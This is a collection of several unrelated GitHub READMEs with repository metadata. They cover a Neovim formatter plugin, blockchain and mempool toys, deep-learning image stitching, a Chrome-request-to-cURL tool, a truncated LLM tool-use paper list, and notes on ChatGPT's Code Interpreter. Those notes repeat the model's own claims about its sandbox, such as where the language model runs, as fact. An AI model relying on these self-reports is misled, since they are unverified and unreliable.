expanded to the tempfile) and read it back and fill in the buffer). - The first item in the `cmd` array will be expanded by default using the `vim.fn.exepath` function in order to detect mason binaries. To opt-out set the `expand_executable` field to `false`. - **CustomFormatter** - passes the lines of the current buffer through a function that modifies them and then updates the contents. - **LazyFormatter** - a function that is called lazily every time we format the file, this allows using a different formatter for different files. ## Partial update When updating all of the lines in a buffer all of the extmarks get removed. In an attempt to avoid that I added an experimental flag `partial_update` that only updates lines that have changed (it's currently using a very simple algorithm, compares each line by index, no advance diffing, I might look into that in the future). You can enable it like this: ```lua require('format-on-save').setup({ partial_update = true, }) ``` ## Installation Add the following to your package manager: ```lua { "elentok/format-on-save.nvim" }, ``` ## Configuration By default this plugin doesn't enable any format on save, you have to specify what you want: ```lua local format_on_save = require("format-on-save") local formatters = require("format-on-save.formatters") format_on_save.setup({ exclude_path_patterns = { "/node_modules/", ".local/share/nvim/lazy", }, formatter_by_ft = { css = formatters.lsp, html = formatters.lsp, java = formatters.lsp, javascript = formatters.lsp, json = formatters.lsp, lua = formatters.lsp, markdown = formatters.prettierd, openscad = formatters.lsp, python = formatters.black, rust = formatters.lsp, scad = formatters.lsp, scss = formatters.lsp, sh = formatters.shfmt, terraform = formatters.lsp, typescript = formatters.prettierd, typescriptreact = formatters.prettierd, yaml = formatters.lsp, -- Add your own shell formatters: myfiletype = formatters.shell({ cmd = { "myformatter", "%" } }), -- Add lazy formatter that will only run when formatting: my_custom_formatter = function() if vim.api.nvim_buf_get_name(0):match("/README.md$") then return formatters.prettierd else return formatters.lsp() end end, -- Add custom formatter filetype1 = formatters.remove_trailing_whitespace, filetype2 = formatters.custom({ format = function(lines) return vim.tbl_map(function(line) return line:gsub("true", "false") end, lines) end}), -- Concatenate formatters python = { formatters.remove_trailing_whitespace, formatters.shell({ cmd = "tidy-imports" }), formatters.black, }, -- Use a tempfile instead of stdin go = { formatters.shell({ cmd = { "goimports-reviser", "-rm-unused", "-set-alias", "-format", "%" }, tempfile = function() return vim.fn.expand("%") .. '.formatter-temp' end }), formatters.shell({ cmd = { "gofmt" } }), }, }, -- Optional: fallback formatter to use when no formatters match the current filetype fallback_formatter = { formatters.remove_trailing_whitespace, formatters.prettierd, } -- By default, all shell commands are prefixed with "sh -c" (see PR #3) -- To prevent that set `run_with_sh` to `false`. run_with_sh = false, }) ``` ### Error messages By default the plugin uses `vim.notify()` to show error messages, you can customize it by setting the `error_notifier` configuration flag: ```lua local format_on_save = require("format-on-save") local message_buffer = require("format-on-save.error-notifiers.message-buffer") format_on_save.setup({ error_notifier = message_buffer, }) ``` Alternatively you can implement your own: ```lua local format_on_save = require("format-on-save") ---@type ErrorNotifier local error_notifier = { show = function(opts) -- use opts.title and opts.body end, hide = function() -- hide the error when it's been resolved end, } format_on_save.setup({ error_notifier = error_notifier, }) ``` ### Disable warning when formatter is successful but wrote to stderr When a formatter exits with exitcode 0 but its stderr has contents we show a warning message (via `vim.notify`). The default level is `vim.log.levels.WARN`. To disable this message entirely set the `stderr_loglevel` config key to `vim.log.levels.OFF`: ```lua require('format-on-save').setup({ stderr_loglevel = vim.log.levels.OFF, }) ``` ### Disable auto commands and user commands By default it will add the `BufWritePre` and `BufWritePost` autocommands and the `Format`, `FormatOn` and `FormatOff` user commands. If you prefer to avoid it and define your own you can disable it: ```lua require('format-on-save').setup({ auto_commands = false, user_commands = false, }) ``` To trigger the format call: ```lua require('format-on-save').format() ``` To restore the cursor positions after the format: ```lua require('format-on-save').restore_cursors() ```
52
1
rya0x/mempool-geth-vs-reth
https://github.com/rya0x/mempool-geth-vs-reth
null
``` ./mempool-geth-vs-reth --help ``` yellow = geth win\ red = reth win ![Screenshot 2023-07-12 at 18 07 01](https://github.com/rya0x/mempool-geth-vs-reth/assets/83345377/5be5477d-98a8-468e-9af2-e8d55a3b217d)
28
0
verytinydever/simpleBlockchainPrototype
https://github.com/verytinydever/simpleBlockchainPrototype
null
# simpleBlockchainPrototype 1. Install nodeJS version 9+ and npm version 2+ 2. Run in console "git clone https://github.com/edrygka/simpleBlockchainPrototype" 3. Then run in following dir "npm install" 4. And run "npm start" In your directory would created "mydb" directory with(leveldb database) and genesis functions that genereted key pair and gives you coin. There are 2 keys in db: 'accounts' which has an array of all accounts info and 'transactions' which has an array of all transactions that was created. *To generate new key pair run in terminal: curl http://localhost:3000/createAccount * *To create new transaction: http://localhost:3001/createTX and input your publick and private keys*
15
0
AIDajiangtang/Superpoint-LightGlue-Image-Stiching
https://github.com/AIDajiangtang/Superpoint-LightGlue-Image-Stiching
Integrate SuperPoint and LightGlue into OpenCV image stitching or Matching algorithm
简体中文 | [English](README_EN.md) # DeepLearning-based-Feature-extraction-and-matching 将深度学习预训练模型 SuperPoint 和 LightGlue 集成到OpenCV拼接算法中。 ## OpenCV拼接流水线</h2> 图像特征提取与匹配是许多高级计算机视觉任务的基础,例如图像配准,图像拼接,相机矫正,SLAM,深度估计等等。 今天我们就以图像拼接为切入点,来看一下特征提取与匹配的重要性。 OpenCV中提供了封装程度非常高的Stitcher类,通过下面几行代码就能实现图像拼接。 Mat pano; Ptr<Stitcher> stitcher = Stitcher::create(mode); Stitcher::Status status = stitcher->stitch(imgs, pano); 但图像拼接整个过程非常复杂。 用文字总结一下拼接算法的主要流程: 特征提取->特征匹配->评估相机参数->生成融合图像 其中特征提取最为重要,特征点和特征描述符的质量好坏决定了最终的拼接效果。 目前OpenCV中提供了SIFT,SURF,ORB等特征提取器。 目前OpenCV中提供了Brute-Force,FLANN,KNN等特征匹配器。 然后,通过下面代码将选择的特征提取和匹配算法设置到拼接流水线中。 if (feature_type == FeatureType::SURF) stitcher->setFeaturesFinder(xfeatures2d::SURF::create()); else if (feature_type == FeatureType::SIFT) stitcher->setFeaturesFinder(SIFT::create()); else stitcher->setFeaturesFinder(ORB::create()); stitcher->setFeaturesMatcher(makePtr<detail::BestOf2NearestMatcher>( false)); stitcher->setFeaturesMatcher(makePtr<detail::BestOf2NearestRangeMatcher>( false)); stitcher->setFeaturesMatcher(makePtr<detail::AffineBestOf2NearestMatcher>(true, false)); 这要感谢C++面向对象编程的思想,通过继承与多态来实现不同特征提取和匹配算法的扩展。 ## 深度学习特征检测匹配算法</h2> 说到这里该我们的主角出场了,我们要为OpenCV追加一种深度学习特征提取算法:SuperPoint,以及深度学习特征匹配算法:LightGlue。 SuperPoint:​ [[`Paper`](https://arxiv.org/pdf/1712.07629.pdf)] [[`源码`](https://github.com/rpautrat/SuperPoint )] ​ LightGlue: [[`Paper`](https://arxiv.org/pdf/2306.13643.pdf )] [[`源码`](https://github.com/cvg/LightGlue)] 根据OpenCV中类继承体系,特征提取类的基类为Feature2D,特征匹配的基类为FeaturesMatcher,我们以此为基类新增两个类:SuperPoint和LightGlue,并重新实现基类的虚方法。 [superpoint](superpoint.cpp) [lightglue](lightglue.cpp) ## 如何编译</h2> 目前仅在Windows 11,Visualstudio2019,Cmake3.26.4中测试成功 1.微信公众号回复【sl】获取预训练模型 ,模型路径通过参数传递给程序 微信公众号:**人工智能大讲堂** <img width="180" src="https://user-images.githubusercontent.com/18625471/228743333-77abe467-2385-476d-86a2-e232c6482291.jpg"> 后台回复【sl】获取上面的预训练模型和第三方依赖库。 2.微信公众号回复【sl】获取第三方库:OpenCV和ONNXRuntime,然后将其解压到源码目录,OPenCV是我用Visual Studio2019编译的。ONNXRuntime不需要自己编译,下载官网编译好的即可 最终的项目结构如下: project_root/ |- common.h |- superpoint.h |- superpoint.cpp |- lightglue.h |- lightglue.cpp |- cppDemo.cpp |- opencv/ |- onnxruntime-win-x64-1.15.1/ |- CMakeLists.txt 3.打开Cmake,输入源码路径和编译输出路径,然后以此点积Config->Generate->Open Project ## 集成到OpenCV中</h2> 然后将新增加的类设置到拼接流水线中。 [CPPDemo](cppDemo.cpp) Mat pano; Ptr<Stitcher> stitcher = Stitcher::create(mode); Ptr<SuperPoint> superpointp = makePtr<SuperPoint>(sp); Ptr<LightGlue> lightglue = makePtr<LightGlue>(lh, mode); stitcher->setPanoConfidenceThresh(0.1f); stitcher->setFeaturesFinder(superpointp);//SpuerPoint feature extraction stitcher->setFeaturesMatcher(lightglue);//LightGlue feature matching Stitcher::Status status = stitcher->stitch(imgs, pano); 1.将onnxruntime.dll和opencv_world455.dll(opencv_world455d.dll debug模式)放到exe路径下 2.运行cppDemo.exe,并设置参数,例如--mode panorama --lg D:\\superpoint_lightglue.onnx --sp D:\\superpoint.onnx D:\\1.jpg D:\2.jpg <img width="500" src="https://user-images.githubusercontent.com/18625471/256421932-94e8b07b-fc4b-4307-a94e-e7e735d620d8.jpg"> 拼接支持两种变换模型,仿射变换和透视变换,由--mode (panorama|scans)指定,panorama表示透视变换模型,scans代表仿射变换模型 --sp 指定superpoint onnx格式模型路径 --lg 指定lightflue onnx格式模型路径 D:\\1.jpg D:\2.jpg为拼接输入图像 拼接结果 <img width="500" src="https://user-images.githubusercontent.com/18625471/256420139-3c03fbcb-3047-44a5-9403-d98f86e222da.jpg"> 特征匹配 <img width="800" src="https://user-images.githubusercontent.com/18625471/256420458-c296cd92-ddbc-479d-a224-ba01a56450f5.jpg"> 对于不熟悉C++的,我还提供了C#Demo [CSharpDemo](csharpDemo.cs)
11
3
dextersjab/code-interpreter-notes
https://github.com/dextersjab/code-interpreter-notes
Notes and insights about OpenAI's Code Interpreter
# Notes about ChatGPT's Code Interpreter ## Project Structure This repository primarily contains notes and documentation about OpenAI's Code Interpreter. Important files include: - `system_prompt.md`: the system prompt for the Code Interpreter. - `system.md`: details about the system environment where the code interpreter operates, including information about the OS, - processor, RAM, and environment variables. - `env`: the system environment variables. - `requirements.txt`: A list of Python package dependencies required for Code Interpreter. - `dev_scripts`: A directory containing utility scripts that assist in the exploration and understanding of Code Interpreter's capabilities. ## Environment Below is what Code Interpreter reveals about its working environment. ### Python Environment The Python environment in which the code is executed is based on Python 3. Python is a high-level, interpreted, and general-purpose dynamic programming language that focuses on code readability. The Python Software Foundation's standard runtime environment is used, which includes a wide variety of standard libraries. Libraries can be found in [requirements.txt](requirements.txt). ### Package Management Python packages are managed using pip, the standard package manager for Python. You can install, upgrade, and remove Python packages using pip. ### Jupyter Notebook Environment The code execution takes place in a Jupyter Notebook environment. Jupyter is an open-source web application that allows the creation and sharing of documents that contain live code, equations, visualizations, and narrative text. The Jupyter notebook is an interactive computing environment that enables users to author notebook documents that include code, widgets, plots, and narrative text. The notebook extends the console-based approach to interactive computing in a qualitatively new direction, providing a web-based application suitable for capturing the whole computation process. ### Execution Time Python code that you send for execution will time out after 120 seconds if it doesn't complete. This is to ensure that long-running code doesn't lock up the interactive environment. ### File Storage Files can be stored and persisted in the /mnt/data directory. This allows you to upload and download files from the Jupyter environment. Note that these files will be available only for the duration of your current session and will not be preserved across different sessions. ### Internet Access The Python environment does not have internet access. This means that you cannot make HTTP requests or API calls directly from your Python code. This is a security feature designed to prevent unauthorized network activity. ### Code Interpreter The OpenAI's Code Interpreter allows ChatGPT to interpret and execute Python code within the Jupyter Notebook environment. This can be used for running Python scripts, performing computations, generating plots, and more. ### Environment Isolation Each session operates in an isolated environment. This means your code won't have access to the underlying operating system, ensuring the safety and privacy of your data. ### Containerization The Python and Jupyter environments are containerized. This means that each user session is isolated within its own environment, which includes a specific version of Python and certain pre-installed packages. This isolation ensures that the Python code execution environment is consistent across all sessions and users. Containers are lightweight and portable, which makes it easy to manage and scale the infrastructure. ### Kubernetes Kubernetes is used to orchestrate the containers. It is responsible for deploying containers, scaling them according to demand, and managing their lifecycle. Kubernetes also handles networking between containers and provides services like load balancing, service discovery, and secret management. ### Networking Within the Kubernetes cluster, each container has its own IP address and can communicate with other containers using standard TCP/IP protocols. However, for security reasons, the containers are isolated from the internet and cannot make outgoing network requests. This means that you can't fetch data from the web or call APIs directly from your Python code. ### Storage While containers themselves are ephemeral (meaning they are destroyed when the session ends), data can be stored and persisted using volumes. In this environment, the /mnt/data directory is mounted as a volume, so you can use it to save and load files within a session. ### File Storage Files can be stored and persisted in the /mnt/data directory. This allows you to upload and download files from the Jupyter environment. The /home/sandbox directory is the default working directory, where scripts are executed and where relative paths are resolved from. Note that these files will be available only for the duration of your current session and will not be preserved across different sessions. ### Security The use of containers and Kubernetes also provides a number of security benefits. The isolation between containers helps to limit the impact of security vulnerabilities. In addition, network policies can be used to control which containers can communicate with each other, and Role-Based Access Control (RBAC) can be used to control who can access the Kubernetes API and what actions they can perform. ### User Sessions and Container Communication In the context of the Code Interpreter, each user session operates within a single, isolated container. This container includes both the language model and the Python execution environment. Importantly, containers associated with different user sessions do not communicate with each other, ensuring the privacy and security of each individual session. ## Contribution Contributions to this repository are welcome. If you have additional notes or scripts that you believe would benefit others in understanding or using OpenAI's Code Interpreter, feel free to create a pull request.
11
0
fipso/cntui
https://github.com/fipso/cntui
Replay chrome requests from your terminal using curl
# Chrome DevTools Network TUI (cnTUI) Little cli/tui tool to export HTTP requests to cURL commands from the terminal. Currently exports requests to your X11 clipboard using xclip. ![image](https://github.com/fipso/cntui/assets/8930842/074541a2-10a5-426a-aaad-b6051b81e5f8) ### Installation Requirements: go, xclip `git clone https://github.com/fipso/cntui.git` `go build .` `sudo cp /usr/local/bin cntui` ### Usage - Start chrome with open DevTools Server (Debug mode): `google-chrome-stable --remote-debugging-port=9222` - Select tab you want to hack on - Run `cntui` - Select a request. Hit enter - cURL command is now in your clipboard. Paste. Have fun ### TODO: - [ ] Edit Mode: edit post body in terminal editor - [ ] Replay request directly - [ ] Request description screen The development of this tool has been recorded on YouTube: https://www.youtube.com/watch?v=ywqy_tIq7xc&list=PLd-Mx7H0BuG9Cfsu-8oqUS54MxbaOxmg9
10
0
xlang-ai/llm-tool-use
https://github.com/xlang-ai/llm-tool-use
Paper collection on LLM tool use and code generation covered in the ACL tutorial on complex reasoning
# LLM Tool Use Papers ![](https://img.shields.io/github/last-commit/xlang-ai/llm-ttol-use?color=green) ![](https://img.shields.io/badge/PaperNumber-90-brightgreen) ![](https://img.shields.io/badge/PRs-Welcome-red) ## Introduction ### Group ## Papers 1. **CLIPort: What and Where Pathways for Robotic Manipulation.** CoRL 2021 *Mohit Shridhar, Lucas Manuelli, Dieter Fox* [[pdf](https://arxiv.org/abs/2109.12098)], 2021.9 2. **Language Models as Zero-Shot Planners: Extracting Actionable Knowledge for Embodied Agents.** ICML 2022 *Wenlong Huang, Pieter Abbeel, Deepak Pathak, Igor Mordatch* [[pdf](https://arxiv.org/abs/2201.07207)], 2022.1 3. **Socratic Models: Composing Zero-Shot Multimodal Reasoning with Language.** ICLR 2023 *Andy Zeng, Maria Attarian, Brian Ichter, Krzysztof Choromanski, Adrian Wong, Stefan Welker, Federico Tombari, Aveek Purohit, Michael Ryoo, Vikas Sindhwani, Johnny Lee, Vincent Vanhoucke, Pete Florence* [[pdf](https://arxiv.org/abs/2204.00598)], 2022.4 4. **Do As I Can, Not As I Say: Grounding Language in Robotic Affordances.** CoRL 2022 *Michael Ahn, Anthony Brohan, Noah Brown, Yevgen Chebotar, Omar Cortes, Byron David, Chelsea Finn, Chuyuan Fu, Keerthana Gopalakrishnan, Karol Hausman, Alex Herzog, Daniel Ho, Jasmine Hsu, Julian Ibarz, Brian Ichter, Alex Irpan, Eric Jang, Rosario Jauregui Ruano, Kyle Jeffrey, Sally Jesmonth, Nikhil J Joshi, Ryan Julian, Dmitry Kalashnikov, Yuheng Kuang, Kuang-Huei Lee, Sergey Levine, Yao Lu, Linda Luu, Carolina Parada, Peter Pastor, Jornell Quiambao, Kanishka Rao, Jarek Rettinghouse, Diego Reyes, Pierre Sermanet, Nicolas Sievers, Clayton Tan, Alexander Toshev, Vincent Vanhoucke, Fei Xia, Ted Xiao, Peng Xu, Sichun Xu, Mengyuan Yan, Andy Zeng* [[pdf](https://arxiv.org/abs/2204.01691)], 2022.4 5. **TALM: Tool Augmented Language Models.** Arxiv *Aaron Parisi, Yao Zhao, Noah Fiedel* [[pdf](https://arxiv.org/abs/2205.12255)], 2022.5 6. **Inner Monologue: Embodied Reasoning through Planning with Language Models.** CoRL 2022 *Wenlong Huang, Fei Xia, Ted Xiao, Harris Chan, Jacky Liang, Pete Florence, Andy Zeng, Jonathan Tompson, Igor Mordatch, Yevgen Chebotar, Pierre Sermanet, Noah Brown, Tomas Jackson, Linda Luu, Sergey Levine, Karol Hausman, Brian Ichter* [[pdf](https://arxiv.org/abs/2207.05608)], 2022.7 7. **JARVIS: A Neuro-Symbolic Commonsense Reasoning Framework for Conversational Embodied Agents.** SoCal NLP 2022 *Kaizhi Zheng, Kaiwen Zhou, Jing Gu, Yue Fan, Jialu Wang, Zonglin Di, Xuehai He, Xin Eric Wang* [[pdf](https://arxiv.org/abs/2208.13266)], 2022.8 8. **ProgPrompt: Generating Situated Robot Task Plans using Large Language Models.** ICRA 2023 *Ishika Singh, Valts Blukis, Arsalan Mousavian, Ankit Goyal, Danfei Xu, Jonathan Tremblay, Dieter Fox, Jesse Thomason, Animesh Garg* [[pdf](https://arxiv.org/abs/2209.11302)], 2022.9 9. **Code as Policies: Language Model Programs for Embodied Control.** ICRA 2023 *Jacky Liang, Wenlong Huang, Fei Xia, Peng Xu, Karol Hausman, Brian Ichter, Pete Florence, Andy Zeng* [[pdf](https://arxiv.org/abs/2209.07753)], 2022.9 10. **Binding Language Models in Symbolic Languages.** ICLR 2023 *Zhoujun Cheng, Tianbao Xie, Peng Shi, Chengzu Li, Rahul Nadkarni, Yushi Hu, Caiming Xiong, Dragomir Radev, Mari Ostendorf, Luke Zettlemoyer, Noah A. Smith, Tao Yu* [[pdf](https://arxiv.org/abs/2210.02875)], 2022.10 11. **VIMA: General Robot Manipulation with Multimodal Prompts.** ICML 2023 *Yunfan Jiang, Agrim Gupta, Zichen Zhang, Guanzhi Wang, Yongqiang Dou, Yanjun Chen, Li Fei-Fei, Anima Anandkumar, Yuke Zhu, Linxi Fan* [[pdf](https://arxiv.org/abs/2210.03094)], 2022.10 12. **Synergizing Reasoning and Acting in Language Models.** ICLR 2023 *Shunyu Yao, Jeffrey Zhao, Dian Yu, Nan Du, Izhak Shafran, Karthik Narasimhan, Yuan Cao* [[pdf](https://arxiv.org/abs/2210.03629)], 2022.10 13. **Mind's Eye: Grounded Language Model Reasoning through Simulation.** ICLR 2023 *Ruibo Liu, Jason Wei, Shixiang Shane Gu, Te-Yen Wu, Soroush Vosoughi, Claire Cui, Denny Zhou, Andrew M. Dai* [[pdf](https://arxiv.org/abs/2210.05359)], 2022.10 14. **Code4Struct: Code Generation for Few-Shot Event Structure Prediction.** ACL 2023 *Xingyao Wang, Sha Li, Heng Ji* [[pdf](https://arxiv.org/abs/2210.12810)], 2022.10 15. **PAL: Program-aided Language Models.** ICML 2023 *Luyu Gao, Aman Madaan, Shuyan Zhou, Uri Alon, Pengfei Liu, Yiming Yang, Jamie Callan, Graham Neubig* [[pdf](https://arxiv.org/abs/2211.10435)], 2022.11 16. **Visual Programming: Compositional visual reasoning without training.** CVPR 2023 *Tanmay Gupta, Aniruddha Kembhavi* [[pdf](https://arxiv.org/abs/2211.11559)], 2022.11 17. **Program of Thoughts Prompting: Disentangling Computation from Reasoning for Numerical Reasoning Tasks.** Arxiv *Wenhu Chen, Xueguang Ma, Xinyi Wang, William W. Cohen* [[pdf](https://arxiv.org/abs/2211.12588)], 2022.11 18. **Planning with Large Language Models via Corrective Re-prompting.** Neurips 2023 workshop *Shreyas Sundara Raman, Vanya Cohen, Eric Rosen, Ifrah Idrees, David Paulius, Stefanie Tellex* [[pdf](https://arxiv.org/abs/2211.09935)], 2022.11 19. **LLM-Planner: Few-Shot Grounded Planning for Embodied Agents with Large Language Models.** Arxiv *Chan Hee Song, Jiaman Wu, Clayton Washington, Brian M. Sadler, Wei-Lun Chao, Yu Su* [[pdf](https://arxiv.org/abs/2212.04088)], 2022.12 20. **RT-1: Robotics Transformer for Real-World Control at Scale.** Arxiv *Anthony Brohan, Noah Brown, Justice Carbajal, Yevgen Chebotar, Joseph Dabis, Chelsea Finn, Keerthana Gopalakrishnan, Karol Hausman, Alex Herzog, Jasmine Hsu, Julian Ibarz, Brian Ichter, Alex Irpan, Tomas Jackson, Sally Jesmonth, Nikhil J Joshi, Ryan Julian, Dmitry Kalashnikov, Yuheng Kuang, Isabel Leal, Kuang-Huei Lee, Sergey Levine, Yao Lu, Utsav Malla, Deeksha Manjunath, Igor Mordatch, Ofir Nachum, Carolina Parada, Jodilyn Peralta, Emily Perez, Karl Pertsch, Jornell Quiambao, Kanishka Rao, Michael Ryoo, Grecia Salazar, Pannag Sanketi, Kevin Sayed, Jaspiar Singh, Sumedh Sontakke, Austin Stone, Clayton Tan, Huong Tran, Vincent Vanhoucke, Steve Vega, Quan Vuong, Fei Xia, Ted Xiao, Peng Xu, Sichun Xu, Tianhe Yu, Brianna Zitkovich* [[pdf](https://arxiv.org/abs/2212.06817)], 2022.12 21. **Don't Generate, Discriminate: A Proposal for Grounding Language Models to Real-World Environments.** ACL 2023 *Yu Gu, Xiang Deng, Yu Su* [[pdf](https://arxiv.org/abs/2212.09736)], 2022.12 22. **Do Embodied Agents Dream of Pixelated Sheep: Embodied Decision Making using Language Guided World Modelling** ICML 2023 *Kolby Nottingham, Prithviraj Ammanabrolu, Alane Suhr, Yejin Choi, Hannaneh Hajishirzi, Sameer Singh, Roy Fox* [[pdf](https://arxiv.org/abs/2301.12050)], 2023.1 23. **Large language models are versatile decomposers: Decompose evidence and questions for table-based reasoning.** SIGIR 2023 *Yunhu Ye, Binyuan Hui, Min Yang, Binhua Li, Fei Huang, Yongbin Li* [[pdf](https://arxiv.org/abs/2301.13808)], 2023.1 24. **Augmented Language Models: a Survey.** Arxiv *Grégoire Mialon, Roberto Dessì, Maria Lomeli, Christoforos Nalmpantis, Ram Pasunuru, Roberta Raileanu, Baptiste Rozière, Timo Schick, Jane Dwivedi-Yu, Asli Celikyilmaz, Edouard Grave, Yann LeCun, Thomas Scialom* [[pdf](https://arxiv.org/abs/2302.07842)], 2023.2 25. **Collaborating with language models for embodied reasoning.** NeurIPS 2022 LaReL workshop *Ishita Dasgupta, Christine Kaeser-Chen, Kenneth Marino, Arun Ahuja, Sheila Babayan, Felix Hill, Rob Fergus* [[pdf](https://arxiv.org/abs/2302.00763)], 2023.2 26. **Describe, Explain, Plan and Select: Interactive Planning with Large Language Models Enables Open-World Multi-Task Agents.** Arxiv *Zihao Wang, Shaofei Cai, Anji Liu, Xiaojian Ma, Yitao Liang* [[pdf](https://arxiv.org/abs/2302.01560)], 2023.2 27. **Toolformer: Language Models Can Teach Themselves to Use Tools.** Arxiv *Timo Schick, Jane Dwivedi-Yu, Roberto Dessì, Roberta Raileanu, Maria Lomeli, Luke Zettlemoyer, Nicola Cancedda, Thomas Scialom* [[pdf](https://arxiv.org/abs/2302.04761)], 2023.2 28. **Grounded Decoding: Guiding Text Generation with Grounded Models for Robot Control.** Arxiv *Wenlong Huang, Fei Xia, Dhruv Shah, Danny Driess, Andy Zeng, Yao Lu, Pete Florence, Igor Mordatch, Sergey Levine, Karol Hausman, Brian Ichter* [[pdf](https://arxiv.org/abs/2303.00855)], 2023.3 29. **PaLM-E: An Embodied Multimodal Language Model.** Arxiv *Danny Driess, Fei Xia, Mehdi S. M. Sajjadi, Corey Lynch, Aakanksha Chowdhery, Brian Ichter, Ayzaan Wahid, Jonathan Tompson, Quan Vuong, Tianhe Yu, Wenlong Huang, Yevgen Chebotar, Pierre Sermanet, Daniel Duckworth, Sergey Levine, Vincent Vanhoucke, Karol Hausman, Marc Toussaint, Klaus Greff, Andy Zeng, Igor Mordatch, Pete Florence* [[pdf](https://arxiv.org/abs/2303.03378)], 2023.3 30. **Visual ChatGPT: Talking, Drawing and Editing with Visual Foundation Models.** Arxiv *Chenfei Wu, Shengming Yin, Weizhen Qi, Xiaodong Wang, Zecheng Tang, Nan Duan* [[pdf](https://arxiv.org/abs/2303.04671)], 2023.3 31. **ViperGPT: Visual Inference via Python Execution for Reasoning.** Arxiv *Dídac Surís, Sachit Menon, Carl Vondrick* [[pdf](https://arxiv.org/abs/2303.08128)], 2023.3 32. **ART: Automatic multi-step reasoning and tool-use for large language models.** Arxiv *Bhargavi Paranjape, Scott Lundberg, Sameer Singh, Hannaneh Hajishirzi, Luke Zettlemoyer, Marco Tulio Ribeiro* [[pdf](http://arxiv.org/abs/2303.09014)], 2023.3 33. **Text2Motion: From Natural Language Instructions to Feasible Plans** ICRA 2023 PT4R Workshop *Kevin Lin, Christopher Agia, Toki Migimatsu, Marco Pavone, Jeannette Bohg* [[pdf](https://arxiv.org/abs/2303.12153)], 2023.3 34. **TaskMatrix.AI: Completing Tasks by Connecting Foundation Models with Millions of APIs.** Arxiv *Yaobo Liang, Chenfei Wu, Ting Song, Wenshan Wu, Yan Xia, Yu Liu, Yang Ou, Shuai Lu, Lei Ji, Shaoguang Mao, Yun Wang, Linjun Shou, Ming Gong, Nan Duan* [[pdf](https://arxiv.org/abs/2303.16434)], 2023.3 35. **HuggingGPT: Solving AI Tasks with ChatGPT and its Friends in HuggingFace.** Arxiv *Yongliang Shen, Kaitao Song, Xu Tan, Dongsheng Li, Weiming Lu, Yueting Zhuang* [[pdf](https://arxiv.org/abs/2303.17580)], 2023.3 36. **OpenAGI: When LLM Meets Domain Experts.** Arxiv *Yingqiang Ge, Wenyue Hua, Kai Mei, Jianchao Ji, Juntao Tan, Shuyuan Xu, Zelong Li, Yongfeng Zhang* [[pdf](https://arxiv.org/abs/2304.04370)], 2023.4 37. **API-Bank: A Benchmark for Tool-Augmented LLMs.** Arxiv *Minghao Li, Feifan Song, Bowen Yu, Haiyang Yu, Zhoujun Li, Fei Huang, Yongbin Li* [[pdf](https://arxiv.org/abs/2304.08244)], 2023.4 38. **Tool Learning with Foundation Models.** Arxiv *Yujia Qin, Shengding Hu, Yankai Lin, Weize Chen, Ning Ding, Ganqu Cui, Zheni Zeng, Yufei Huang, Chaojun Xiao, Chi Han, Yi Ren Fung, Yusheng Su, Huadong Wang, Cheng Qian, Runchu Tian, Kunlun Zhu, Shihao Liang, Xingyu Shen, Bokai Xu, Zhen Zhang, Yining Ye, Bowen Li, Ziwei Tang, Jing Yi, Yuzhang Zhu, Zhenning Dai, Lan Yan, Xin Cong, Yaxi Lu, Weilin Zhao, Yuxiang Huang, Junxi Yan, Xu Han, Xian Sun, Dahai Li, Jason Phang, Cheng Yang, Tongshuang Wu, Heng Ji, Zhiyuan Liu, Maosong Sun* [[pdf](https://arxiv.org/abs/2304.08354)], 2023.4 39. **GeneGPT: Augmenting Large Language Models with Domain Tools for Improved Access to Biomedical Information.** Arxiv *Qiao Jin, Yifan Yang, Qingyu Chen, Zhiyong Lu* [[pdf](http://arxiv.org/abs/2304.09667)], 2023.4 40. **Chameleon: Plug-and-Play Compositional Reasoning with Large Language Models.** Arxiv *Pan Lu, Baolin Peng, Hao Cheng, Michel Galley, Kai-Wei Chang, Ying Nian Wu, Song-Chun Zhu, Jianfeng Gao* [[pdf](https://arxiv.org/abs/2304.09842)], 2023.4 41. **LLM+P: Empowering Large Language Models with Optimal Planning Proficiency.** Arxiv *Bo Liu, Yuqian Jiang, Xiaohan Zhang, Qiang Liu, Shiqi Zhang, Joydeep Biswas, Peter Stone* [[pdf](https://arxiv.org/abs/2304.11477)], 2023.4 42. **Programmatically Grounded, Compositionally Generalizable Robotic Manipulation** ICLR 2023 *Renhao Wang, Jiayuan Mao, Joy Hsu, Hang Zhao, Jiajun Wu, Yang Gao* [[pdf](https://arxiv.org/abs/2304.13826)], 2023.4 43. **Search-in-the-Chain: Towards Accurate, Credible and Traceable Large Language Models for Knowledge-intensive Tasks.** Arxiv *Shicheng Xu, Liang Pang, Huawei Shen, Xueqi Cheng, Tat-Seng Chua* [[pdf](https://arxiv.org/abs/2304.14732)], 2023.4 44. **Can LLM Already Serve as A Database Interface? A BIg Bench for Large-Scale Database Grounded Text-to-SQLs.** Arxiv *Jinyang Li, Binyuan Hui, Ge Qu, Binhua Li, Jiaxi Yang, Bowen Li, Bailin Wang, Bowen Qin, Rongyu Cao, Ruiying Geng, Nan Huo, Xuanhe Zhou, Chenhao Ma, Guoliang Li, Kevin C.C. Chang, Fei Huang, Reynold Cheng, Yongbin Li* [[pdf](https://arxiv.org/abs/2305.03111)], 2023.5 45. **ToolCoder: Teach Code Generation Models to use API search tools.** Arxiv *Kechi Zhang, Ge Li, Jia Li, Zhuo Li, Zhi Jin* [[pdf](https://arxiv.org/abs/2305.04032)], 2023.5 46. **TidyBot: Personalized Robot Assistance with Large Language Models** IROS 2023 *Jimmy Wu, Rika Antonova, Adam Kan, Marion Lepert, Andy Zeng, Shuran Song, Jeannette Bohg, Szymon Rusinkiewicz, Thomas Funkhouser* [[pdf](https://arxiv.org/abs/2305.05658)], 2023.5 47. **Small models are valuable plug-ins for large language models.** Arxiv *Canwen Xu, Yichong Xu, Shuohang Wang, Yang Liu, Chenguang Zhu, Julian McAuley* [[pdf](https://arxiv.org/abs/2305.08848)], 2023.5 48. **Multimodal Web Navigation with Instruction-Finetuned Foundation Models.** ICLR 2023 Workshop ME-FoMo *Hiroki Furuta, Ofir Nachum, Kuang-Huei Lee, Yutaka Matsuo, Shixiang Shane Gu, Izzeddin Gur* [[pdf](https://arxiv.org/abs/2305.11854)], 2023.5 49. **ToolkenGPT: Augmenting Frozen Language Models with Massive Tools via Tool Embeddings.** Arxiv *Shibo Hao, Tianyang Liu, Zhen Wang, Zhiting Hu* [[pdf](https://arxiv.org/abs/2305.11554)], 2023.5 50. **CRITIC: Large Language Models Can Self-Correct with Tool-Interactive Critiquing.** Arxiv *Zhibin Gou, Zhihong Shao, Yeyun Gong, Yelong Shen, Yujiu Yang, Nan Duan, Weizhu Chen* [[pdf](https://arxiv.org/abs/2305.11738)], 